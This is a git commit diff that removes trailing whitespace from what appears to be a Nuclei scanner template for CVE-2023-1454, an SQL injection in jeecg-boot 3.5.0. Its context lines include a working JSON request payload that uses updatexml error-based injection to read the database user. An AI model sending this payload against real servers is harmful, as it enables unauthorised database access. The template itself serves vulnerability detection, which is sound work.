fix trail space

patch-1
Dhiyaneshwaran 2023-06-20 23:55:20 +05:30 committed by GitHub
parent 82530ca7f7
commit 1e85ca79d8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 2 deletions

View File

@ -5,7 +5,7 @@ info:
author: DhiyaneshDK
severity: critical
description: |
A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.
A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.
reference:
- https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln/tree/master
- https://nvd.nist.gov/vuln/detail/CVE-2023-1454
@ -29,7 +29,6 @@ http:
Content-Type: application/json;charset=UTF-8
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
matchers-condition: and
matchers: